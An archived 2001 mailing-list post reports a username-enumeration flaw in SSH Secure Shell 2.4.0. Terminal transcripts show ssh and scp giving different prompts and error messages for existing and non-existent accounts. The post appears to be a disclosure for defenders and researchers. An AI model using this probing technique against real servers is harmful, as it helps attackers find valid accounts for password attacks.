Vulnerability Development mailing list archives

SSH 2.4.0/3.0.1 usernames guessable ?

From: Marco van Berkum <m.v.berkum () obit nl>
Date: Mon, 03 Sep 2001 16:09:35 +0200

Hi,

--- My two cents---

As we were playing a bit with some SSH versions we
came across some interesting 'bugs'. I hope this is not
a 'known' bug, but I wasn't able to find any documentation
regarding this flaw.

I'll show the test from SSH 2.4.0 -> 2.4.0
(non-commercial version)

Making a telnetconnection to see the version:

root@ws:~# telnet test 22
Trying 192.168.1.15...
Connected to test.
Escape character is '^]'.
SSH-1.99-2.4.0 SSH Secure Shell (non-commercial)
^]
telnet> q
Connection closed.

This is my SSH version:

root@ws:~# ssh -V
ssh: SSH Secure Shell 2.4.0 (non-commercial version) on
i686-pc-linux-gnu

Lets try to make a ssh connection for a non existing user:

root@ws:~# ssh blaaaaa@test
blaaaaa's password:
warning: Authentication failed.
Disconnected; connection lost (Connection closed.).

Now I try it for a existing user:

root@ws:~# ssh marco@test
marco's password:
marco's password:
marco's password:
warning: Authentication failed.
Disconnected; no more authentication methods available (No further
authentication methods available.).

A clear difference in the output.

Now lets try scp with a non existing user.

root@ws:~# touch test.txt
root@ws:~# scp test.txt blaaa@test:/home/blaaa
blaaa@test's password:
scp: warning: ssh2 client failed to authenticate. (or you have too old
ssh2 installed, check with ssh2 -V)
warning: Authentication failed.
Disconnected; connection lost (Connection closed.).
scp: warning: child process (ssh2) exited with code 1.

And now with a existing user

root@ws:~# scp test.txt marco@test:/home/marco
marco@test's password:
marco@test's password:
marco@test's password:
scp: warning: ssh2 client failed to authenticate. (or you have too old
ssh2 installed, check with ssh2 -V)
warning: Authentication failed.
Disconnected; no more authentication methods available (No further
authentication methods available.).
scp: warning: child process (ssh2) exited with code 1.

Again, a clear difference in the output.